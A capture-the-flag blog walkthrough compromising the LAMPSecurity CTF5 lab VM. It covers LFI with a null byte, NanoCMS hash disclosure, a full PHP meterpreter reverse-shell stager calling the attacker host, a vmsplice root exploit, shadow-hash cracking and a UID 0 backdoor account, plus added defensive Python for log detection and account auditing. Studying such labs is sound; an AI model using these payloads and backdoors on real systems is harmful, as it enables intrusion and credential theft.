Sunday, November 1, 2015

Tango Down (CTF5) : Capture The Flag (CTF) 5 Lamp Security Challenge


Lab Environment :

Victim Host : https://www.vulnhub.com/entry/lampsecurity-ctf5,84/  on VirtualBox (MacOS)
Attacking Host : KALI (On Virtual Box)
Network : Host-Only (VirtualBox)
Tools : As mentioned in the walkthrough below


Discovery :

Install the image

Run a network scan on the range :
root@kali:~/vulhub/ctf5# nmap -sT 192.168.56.1-254
Starting Nmap 6.47 ( http://nmap.org ) at 2015-10-31 00:22 GMT
Nmap scan report for 192.168.56.1
Host is up (0.00036s latency).
All 1000 scanned ports on 192.168.56.1 are closed
MAC Address: 0A:00:27:00:00:00 (Unknown)

Nmap scan report for 192.168.56.100
Host is up (0.000079s latency).
All 1000 scanned ports on 192.168.56.100 are filtered
MAC Address: 08:00:27:79:AC:8C (Cadmus Computer Systems)

Nmap scan report for 192.168.56.101
Host is up (0.0023s latency).
Not shown: 990 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
110/tcp  open  pop3
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
143/tcp  open  imap
445/tcp  open  microsoft-ds
901/tcp  open  samba-swat
3306/tcp open  mysql
MAC Address: 08:00:27:C3:02:2B (Cadmus Computer Systems)

Nmap scan report for 192.168.56.110
Host is up (0.00010s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 254 IP addresses (4 hosts up) scanned in 15.32 seconds


Possible vectors are :

  • Webserver
  • Mail (IMAP,POP)
  • NFS, Portmapper
  • netbios
  • samba
  • mysql


Assessing the webserver:
Open the link in a browser (http://192.168.56.101)

It gives us the default Linux Apache page:






I just tried different paths,

e.g. index.php, which gives the below:




When I click blog I get :



When I go back and click contact :



Go back and click Events



Now we see that it has several different web apps installed.

Now, on the blog page, clicking the links in the navigation pane I got the below: Webmail




Admin Login





Vulnerability Assessment and Exploit :

The SquirrelMail version had 2 known vulnerabilities:
root@kali:/var/www# searchsploit squirrel | grep 1.4.x
SquirrelMail 1.4.x Folder Name Cross-Site Scripting Vulnerability | /php/webapps/24068.txt
Squirrelmail 1.4.x Redirect.PHP Local File Include Vulnerability | /php/webapps/27948.txt

Tried them:
Squirrelmail 1.4.x Redirect.PHP Local File Include Vulnerability:



SquirrelMail 1.4.x Folder Name Cross-Site Scripting Vulnerability:

Same as above, no luck..

Now let's run Nikto to see if we can get some more:

root@kali:~/tools/practice/bash/lab# nikto -h http://192.168.56.101

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.101
+ Target Hostname: 192.168.56.101
+ Target Port: 80
+ Start Time: 2015-10-31 21:18:00 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.2.6 (Fedora)
+ Retrieved x-powered-by header: PHP/5.2.4
+ The anti-clickjacking X-Frame-Options header is not present.
+ Apache/2.2.6 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ OSVDB-637: Enumeration of users is possible by requesting ~username (responds with 'Forbidden' for users, 'not found' for non-existent users).
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ /index.php?page=../../../../../../../../../../etc/passwd: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page=../../../../../../../../../../boot.ini: PHP include error may indicate local or remote file inclusion is possible.

+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ Cookie SQMSESSID created without the httponly flag
+ OSVDB-3093: /mail/src/read_body.php: SquirrelMail found
+ OSVDB-3093: /squirrelmail/src/read_body.php: SquirrelMail found
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 557285, size: 5108, mtime: Fri Jun 19 19:31:28 1998
+ OSVDB-3233: /icons/README: Apache default file found.
+ /index.php?module=PostWrap&page=http://cirt.net/rfiinc.txt?: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page=http://cirt.net/rfiinc.txt?: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page=http://cirt.net/rfiinc.txt?: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page=http://cirt.net/rfiinc.txt??: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page[path]=http://cirt.net/rfiinc.txt??&cmd=ls: PHP include error may indicate local or remote file inclusion is possible.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ /phpmyadmin/: phpMyAdmin directory found

+ 7355 requests: 0 error(s) and 27 item(s) reported on remote host
+ End Time: 2015-10-31 21:18:37 (GMT0) (37 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

So now we have some more vectors.

Trying the below paths one by one :
/index.php?page=../../../../../../../../../../etc/passwd << As per nikto, no luck





We removed the path and looked at what comes up; as seen above, the application also appends .php as a suffix, so we need to add a null byte, which terminates the string before the .php is appended.

Now keep adding ../ in front of etc/passwd until we get some results.


Bang, the LFI is successful.
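What these include probes look like from the defender's side, as an added detection example that is not part of the original walkthrough: the Python below parses Apache combined-format access_log lines, decodes each query parameter and flags directory traversal, the null-byte trick used above and the remote-URL includes Nikto tested for. The log lines are constructed samples, not captures from the CTF5 VM.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access_log lines (Apache combined format), modelled on the
# probes made in this walkthrough; they were not captured from the CTF5 VM.
SAMPLE_LOG = """\
192.168.56.110 - - [31/Oct/2015:21:18:05 +0000] "GET /index.php?page=../../../../../../etc/passwd HTTP/1.1" 200 1843 "-" "Nikto/2.1.6"
192.168.56.110 - - [31/Oct/2015:21:18:06 +0000] "GET /index.php?page=../../../etc/passwd%00 HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
192.168.56.110 - - [31/Oct/2015:21:18:07 +0000] "GET /index.php?page=http://cirt.net/rfiinc.txt? HTTP/1.1" 500 112 "-" "Nikto/2.1.6"
192.168.56.110 - - [31/Oct/2015:21:18:08 +0000] "GET /index.php?page=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
192.168.56.110 - - [31/Oct/2015:21:19:00 +0000] "GET /index.php?page=blog HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.56.1 - - [31/Oct/2015:21:19:01 +0000] "GET /index.php?page=events&id=3 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# Combined log format: client, ident, user, [timestamp], "request line", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')


def classify_param(value):
    """Return the reasons one query-string value looks like an include attack.

    The value is decoded once more than parse_qsl already did, so that
    double-encoded forms such as %252e%252e%252f are still caught.
    """
    decoded = unquote(value)
    reasons = []
    if '\x00' in decoded:                 # the null byte that cuts off the ".php" suffix
        reasons.append('null-byte')
    if re.search(r'\.\.[/\\]', decoded):  # ../ or ..\ directory traversal
        reasons.append('traversal')
    if re.search(r'etc/(passwd|shadow)|boot\.ini|proc/self', decoded):
        reasons.append('sensitive-file')
    if re.match(r'(https?|ftp|php|data|expect)://', decoded, re.I):  # remote / wrapper include
        reasons.append('remote-include')
    return reasons


def scan_access_log(text):
    """Return one finding per suspicious request: client ip, status, param name, reasons."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group('target')).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            reasons = classify_param(value)
            if reasons:
                findings.append({'ip': m.group('ip'), 'status': int(m.group('status')),
                                 'param': name, 'reasons': reasons})
    return findings


def probable_lfi_sources(findings):
    """Clients whose traversal requests got HTTP 200: likely a working LFI, not just a probe."""
    return sorted({f['ip'] for f in findings
                   if f['status'] == 200 and 'traversal' in f['reasons']})


if __name__ == '__main__':
    hits = scan_access_log(SAMPLE_LOG)
    for h in hits:
        print(f"{h['ip']} status={h['status']} param={h['param']} {','.join(h['reasons'])}")
    print('probable successful LFI from:', probable_lfi_sources(hits))
```

A 200 on a traversal request is the line worth alerting on; the 500s from Nikto's RFI probes show the include failed.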

Now we try to fetch some more information, e.g. the MySQL configuration:



[mysqld]
datadir=/var/lib/mysql
socket=/var/lib/mysql/mysql.sock
user=mysql
# Default to using old password format for compatibility with mysql 3.x
# clients (those using the mysqlclient10 compatibility package).
old_passwords=1

[mysqld_safe]
log-error=/var/log/mysqld.log
pid-file=/var/run/mysqld/mysqld.pid

Try viewing access_log :




Another vector was NanoCMS:




Using Google :



http://www.securityfocus.com/bid/34508/exploit

When we try this :





For us the key from above is :
"username";s:5:"admin";s:8:"password";s:32:"9d2f75377ac0ab991d40c91fd27e52fd";s:7:"version";s:4:"v_4f";}

Now cracking the password :





Now let's try to access the portal: we managed to log in to the admin panel.




Now we see that we have an option to create a new page using the admin panel.

My steps would be:

1- Create a PHP payload on my Kali host
2- Create a page on NanoCMS and paste the payload code into it
3- Open a handler on my Kali host
4- Open the page containing the payload
5- We should get our meterpreter session on the Kali host

Let's try it now.


Step 1 :

root@kali:/var/www# msfpayload php/meterpreter/reverse_tcp LHOST=192.168.56.110 LPORT=4444 R > malicious.php
[!] ************************************************************************
[!] * The utility msfpayload is deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenom instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
root@kali:/var/www# vi malicious.php
root@kali:/var/www# cat malicious.php
#
error_reporting(0);
# The payload handler overwrites this with the correct LHOST before sending
# it to the victim.
$ip = '192.168.56.110';
$port = 4444;
$ipf = AF_INET;

if (FALSE !== strpos($ip, ":")) {
    # ipv6 requires brackets around the address
    $ip = "[" . $ip . "]";
    $ipf = AF_INET6;
}

if (($f = 'stream_socket_client') && is_callable($f)) {
    $s = $f("tcp://{$ip}:{$port}");
    $s_type = 'stream';
} elseif (($f = 'fsockopen') && is_callable($f)) {
    $s = $f($ip, $port);
    $s_type = 'stream';
} elseif (($f = 'socket_create') && is_callable($f)) {
    $s = $f($ipf, SOCK_STREAM, SOL_TCP);
    $res = @socket_connect($s, $ip, $port);
    if (!$res) { die(); }
    $s_type = 'socket';
} else {
    die('no socket funcs');
}
if (!$s) { die('no socket'); }

switch ($s_type) {
    case 'stream': $len = fread($s, 4); break;
    case 'socket': $len = socket_read($s, 4); break;
}
if (!$len) {
    # We failed on the main socket. There's no way to continue, so
    # bail
    die();
}
$a = unpack("Nlen", $len);
$len = $a['len'];

$b = '';
while (strlen($b) < $len) {
    switch ($s_type) {
        case 'stream': $b .= fread($s, $len - strlen($b)); break;
        case 'socket': $b .= socket_read($s, $len - strlen($b)); break;
    }
}

# Set up the socket for the main stage to use.
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
eval($b);
die();


Step 2 :




Step 3:

msf exploit(udev_netlink) > use exploit/multi/handler
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.56.110   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.56.110   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.56.110:4444
[*] Starting the payload handler...

Step 4:





Step 5:

msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.56.110:4444
[*] Starting the payload handler...
[*] Sending stage (40499 bytes) to 192.168.56.101
[*] Meterpreter session 3 opened (192.168.56.110:4444 -> 192.168.56.101:35181) at 2015-10-31 23:49:23 +0000

meterpreter > sysinfo
Computer    : localhost.localdomain
OS          : Linux localhost.localdomain 2.6.23.1-42.fc8 #1 SMP Tue Oct 30 13:55:12 EDT 2007 i686
Meterpreter : php/php

meterpreter > getuid
Server username: apache (48)
meterpreter > getpid
Current pid: 6464


We have a shell now.

However, we are in as the apache user. We need to attempt a privilege escalation.


Now the steps I will try:

Step 1: As I am on Kali Linux, I will search for PE exploits locally first
root@kali:~/vulhub/ctf5# searchsploit 2.6.23 local linux
------------------------------------------------------------- ----------------------------------
 Description                                                 | Path
------------------------------------------------------------- ----------------------------------
Linux Kernel 2.6.23 <= 2.6.24 - vmsplice Local Root Exploit  | /linux/local/5093.c
------------------------------------------------------------- ----------------------------------

Step 2: Compile the binary
root@kali:~/vulhub/ctf5# locate /linux/local/5093.c
/usr/share/exploitdb/platforms/linux/local/5093.c
root@kali:~/vulhub/ctf5# cp /usr/share/exploitdb/platforms/linux/local/5093.c .
root@kali:~/vulhub/ctf5# ls -ltr
total 4
-rwxr-xr-x 1 root root 2883 Nov 1 00:02 5093.c
root@kali:~/vulhub/ctf5# gcc 5093.c -o 5093

Step 3: Transfer the file to the victim from the meterpreter session
meterpreter > lcd vulhub
meterpreter > lcd ctf5
meterpreter > lpwd
/root/vulhub/ctf5
meterpreter > upload 5093 /tmp/5093
[*] uploading  : 5093 -> /tmp/5093
[*] uploaded   : 5093 -> /tmp/5093

Step 4: Now execute the file and see if we get root

meterpreter > shell
Process 13468 created.
Channel 2 created.

cd /tmp

ls
5093
gconfd-patrick
gconfd-root
gnome-system-monitor.patrick.3563912106
mapping-andy
mapping-jennifer
mapping-loren
mapping-patrick
mapping-root


./5093
/bin/sh: line 9: ./5093: Permission denied

chmod +x 5093


./5093
bash: no job control in this shell

bash-3.2# id
uid=0(root) gid=0(root) groups=48(apache) context=system_u:system_r:httpd_t:s0

bash-3.2# whoami
root
WE ARE ROOT NOW !!

Post Exploit:

bash-3.2# cat passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpm:x:37:37:RPM user:/var/lib/rpm:/sbin/nologin
polkituser:x:87:87:PolicyKit:/:/sbin/nologin
avahi:x:499:499:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
openvpn:x:498:497:OpenVPN:/etc/openvpn:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
torrent:x:497:496:BitTorrent Seed/Tracker:/var/spool/bittorrent:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
patrick:x:500:500:Patrick Fair:/home/patrick:/bin/bash
jennifer:x:501:501:Jennifer Sea:/home/jennifer:/bin/bash
andy:x:502:502:Andrew Carp:/home/andy:/bin/bash
loren:x:503:503:Loren Felt:/home/loren:/bin/bash
amy:x:504:504:Amy Pendelton:/home/amy:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash


bash-3.2# cat shadow
root:$1$7ailm4aT$4HlsZaiGztAsgj4JXL92Y.:14362:0:99999:7:::
bin:*:14362:0:99999:7:::
daemon:*:14362:0:99999:7:::
adm:*:14362:0:99999:7:::
lp:*:14362:0:99999:7:::
sync:*:14362:0:99999:7:::
shutdown:*:14362:0:99999:7:::
halt:*:14362:0:99999:7:::
mail:*:14362:0:99999:7:::
news:*:14362:0:99999:7:::
uucp:*:14362:0:99999:7:::
operator:*:14362:0:99999:7:::
games:*:14362:0:99999:7:::
gopher:*:14362:0:99999:7:::
ftp:*:14362:0:99999:7:::
nobody:*:14362:0:99999:7:::
vcsa:!!:14362:0:99999:7:::
rpc:!!:14362:0:99999:7:::
nscd:!!:14362:0:99999:7:::
tcpdump:!!:14362:0:99999:7:::
dbus:!!:14362:0:99999:7:::
rpm:!!:14362:0:99999:7:::
polkituser:!!:14362:0:99999:7:::
avahi:!!:14362:0:99999:7:::
mailnull:!!:14362:0:99999:7:::
smmsp:!!:14362:0:99999:7:::
apache:!!:14362:0:99999:7:::
ntp:!!:14362:0:99999:7:::
sshd:!!:14362:0:99999:7:::
openvpn:!!:14362:0:99999:7:::
rpcuser:!!:14362:0:99999:7:::
nfsnobody:!!:14362:0:99999:7:::
torrent:!!:14362:0:99999:7:::
haldaemon:!!:14362:0:99999:7:::
gdm:!!:14362:0:99999:7:::
patrick:$1$DJYtkxSw$t.47LsE1j2VJKgBVT1Lar0:15679:0:99999:7:::
jennifer:$1$04FqEhSX$Nft0Rs7H2VhUK.fX53cPb1:15679:0:99999:7:::
andy:$1$29jCTuBP$OvytZOP3NacMeAcrbpoMR.:15679:0:99999:7:::
loren:$1$fWsonMXA$1uVln.k4Bh81j2zhCU1jL.:14362:0:99999:7:::
amy:$1$DDLpVzyX$zez4/KCciNorxsjZspzTM0:15679:0:99999:7:::
mysql:!!:14362::::::
cyrus:$1$BzxZidrU$dYMc0ad3NmEJX8L9dNrqJ0:14363::::::

bash-3.2# cd /home
bash-3.2# ls
amy
andy
jennifer
loren
patrick

bash-3.2# cat /etc/issue
Fedora release 8 (Werewolf)
Kernel \r on an \m

bash-3.2# cat /etc/redhat-release
Fedora release 8 (Werewolf)

bash-3.2# ifconfig
eth1      Link encap:Ethernet  HWaddr 08:00:27:C3:02:2B
          inet addr:192.168.56.101  Bcast:192.168.56.255  Mask:255.255.255.0
          inet6 addr: fe80::a00:27ff:fec3:22b/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:162306 errors:2 dropped:0 overruns:0 frame:0
          TX packets:178176 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:20857470 (19.8 MiB)  TX bytes:91664318 (87.4 MiB)
          Interrupt:10 Base address:0xd020

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:3068 errors:0 dropped:0 overruns:0 frame:0
          TX packets:3068 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:239589 (233.9 KiB)  TX bytes:239589 (233.9 KiB)

bash-3.2# cat /etc/hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 localhost.localdomain localhost localhost
::1 localhost6.localdomain6 localhost6


Let's crack the passwords now:

root@kali:~/vulhub/ctf5# john amy.pw
Loaded 1 password hash (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
dolphins (amy)
guesses: 1 time: 0:00:00:01 DONE (Sun Nov 1 00:20:40 2015) c/s: 7394 trying: 1234qwer - johnson
Use the "--show" option to display all of the cracked passwords reliably

root@kali:~/vulhub/ctf5# john andy.pw
Loaded 1 password hash (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
marvin1 (andy)
guesses: 1 time: 0:00:00:02 DONE (Sun Nov 1 00:21:29 2015) c/s: 9584 trying: kimberly1 - moore1
Use the "--show" option to display all of the cracked passwords reliably

root@kali:~/vulhub/ctf5# john patrick.pw
Loaded 1 password hash (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
ne1410s (patrick)
guesses: 1 time: 0:00:00:01 DONE (Sun Nov 1 00:24:13 2015) c/s: 8630 trying: nexus6 - OU812
Use the "--show" option to display all of the cracked passwords reliably

root@kali:~/vulhub/ctf5# john jeniffer.pw
Loaded 1 password hash (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
homebrew (jennifer)
guesses: 1 time: 0:00:00:01 DONE (Sun Nov 1 00:25:05 2015) c/s: 8560 trying: nexus6 - OU812
Use the "--show" option to display all of the cracked passwords reliably

Cracking the root hash using John seems tedious, so let's try hashcat for this purpose instead..

root@kali:~/vulhub/ctf5# hashcat -m 500 root.hash /usr/share/wordlists/rockyou.txt
This copy of hashcat will expire on 01.01.2016. Please upgrade to continue using hashcat.

Initializing hashcat v0.49 with 1 threads and 32mb segment-size...

Added hashes from file root.hash: 1 (1 salts)
Activating quick-digest mode for single-hash with salt

NOTE: press enter for status-screen



Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 1/5 (segment), 3605274 (words), 33550339 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 4.54k plains, 4.54k words
Progress..: 10620/3605274 (0.29%)
Running...: 00:00:00:03
Estimated.: 00:00:13:12

+++ Truncated +++

Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 1/5 (segment), 3605274 (words), 33550339 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 5.63k plains, 5.63k words
Progress..: 3605274/3605274 (100.00%)
Running...: 00:00:10:40
Estimated.: --:--:--:--



Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 2/5 (segment), 3313542 (words), 33550340 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 6.60k plains, 6.60k words
Progress..: 1449296/3313542 (43.74%)
Running...: 00:00:03:39
Estimated.: 00:00:04:42


Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 2/5 (segment), 3313542 (words), 33550340 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 7.34k plains, 7.34k words
Progress..: 3313542/3313542 (100.00%)
Running...: 00:00:07:31
Estimated.: --:--:--:--

++++++ Truncated ++++++

Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 3/5 (segment), 3282543 (words), 33550336 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: 7.92k plains, 7.92k words
Progress..: 3282543/3282543 (100.00%)
Running...: 00:00:06:55
Estimated.: --:--:--:--

$1$7ailm4aT$4HlsZaiGztAsgj4JXL92Y.:50$cent

All hashes have been recovered

Input.Mode: Dict(/usr/share/wordlists/rockyou.txt)
Index.....: 4/5 (segment), 3467513 (words), 33550343 (bytes)
Recovered.: 1/1 hashes, 1/1 salts
Speed/sec.: - plains, 9.13k words
Progress..: 1950272/3467513 (56.24%)
Running...: 00:00:03:34
Estimated.: 00:00:02:46

Started: Sun Nov 1 00:39:44 2015
Stopped: Sun Nov 1 01:08:25 2015


So we see it took around 30 minutes to get the password for root.

root@kali:~/vulhub/ctf5# ssh 192.168.56.101
root@192.168.56.101's password:
Last login: Sat Oct 31 01:43:00 2015 from 192.168.56.110
[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:s0-s0:c0.c1023
[root@localhost ~]# whoami
root
[root@localhost ~]#



Creating a backdoor user with root privileges:

bash-3.2# useradd -ou 0 -g 0 johnsnow
bash-3.2# passwd johnshow
passwd: Unknown user name 'johnshow'.
bash-3.2# cat /etc/passwd | grep john
johnsnow:x:0:0::/home/johnsnow:/bin/bash

bash-3.2# passwd johnsnow
New UNIX password: john
BAD PASSWORD: it is too short
Retype new UNIX password: john
Changing password for user johnsnow.
passwd: all authentication tokens updated successfully.

Testing the user:

root@kali:~/vulhub/ctf5# ssh johnsnow@192.168.56.101
johnsnow@192.168.56.101's password:
Last login: Wed Dec 5 07:28:50 2012
[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:system_r:unconfined_t:s0
[root@localhost ~]#
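As an added defender's check, not part of the original walkthrough: the Python audit below parses /etc/passwd and /etc/shadow and flags exactly the conditions seen on this box: a second UID 0 account such as johnsnow, service accounts like mysql left with /bin/bash, and md5crypt ($1$) hashes, the type that hashcat -m 500 and John cracked here within minutes. The sample files are constructed excerpts and the hash values are placeholders; only the $id$ prefix matters to the audit.

```python
# Constructed /etc/passwd and /etc/shadow excerpts, modelled on the CTF5 dumps
# above with the johnsnow backdoor added; hashes are placeholders, not the VM's.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
patrick:x:500:500:Patrick Fair:/home/patrick:/bin/bash
johnsnow:x:0:0::/home/johnsnow:/bin/bash
"""
SHADOW = """\
root:$1$saltAAAA$placeholderhashAAAAAAAAAA:14362:0:99999:7:::
bin:*:14362:0:99999:7:::
apache:!!:14362:0:99999:7:::
mysql:!!:14362::::::
patrick:$1$saltBBBB$placeholderhashBBBBBBBBBB:15679:0:99999:7:::
johnsnow:$6$saltCCCC$placeholderhashCCCCCCCCCC:16740:0:99999:7:::
"""

SYSTEM_UID_MAX = 499   # Fedora 8 convention: UIDs below 500 are system accounts
NOLOGIN_SHELLS = {'/sbin/nologin', '/usr/sbin/nologin', '/bin/false'}
WEAK_HASH_PREFIXES = {'$1$': 'md5crypt'}   # cheap to crack; what fell to rockyou above


def parse_passwd(text):
    """name -> (uid, gid, shell) for every well-formed /etc/passwd line."""
    users = {}
    for line in text.splitlines():
        f = line.split(':')
        if len(f) == 7:
            users[f[0]] = (int(f[2]), int(f[3]), f[6])
    return users


def parse_shadow(text):
    """name -> password field for every well-formed /etc/shadow line."""
    return {f[0]: f[1] for f in (l.split(':') for l in text.splitlines()) if len(f) == 9}


def classify_hash(field):
    """'locked', 'empty', a weak-algorithm name, or 'other' for a shadow password field."""
    if field == '*' or field.startswith('!'):
        return 'locked'
    if field == '':
        return 'empty'
    for prefix, name in WEAK_HASH_PREFIXES.items():
        if field.startswith(prefix):
            return name
    return 'other'


def audit_accounts(passwd_text, shadow_text):
    """Return (account, issue) pairs for the conditions this walkthrough exploited or created."""
    users = parse_passwd(passwd_text)
    hashes = parse_shadow(shadow_text)
    issues = []
    for name, (uid, gid, shell) in users.items():
        if uid == 0 and name != 'root':
            issues.append((name, 'extra-uid0'))       # useradd -o -u 0 style backdoor
        if 0 < uid <= SYSTEM_UID_MAX and shell not in NOLOGIN_SHELLS:
            issues.append((name, 'service-account-login-shell'))
        if name not in hashes:
            issues.append((name, 'no-shadow-entry'))
            continue
        kind = classify_hash(hashes[name])
        if kind == 'empty':
            issues.append((name, 'no-password'))
        elif kind in WEAK_HASH_PREFIXES.values():
            issues.append((name, kind + '-hash'))
    return issues


if __name__ == '__main__':
    for account, issue in audit_accounts(PASSWD, SHADOW):
        print(f'{issue:30} {account}')
```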

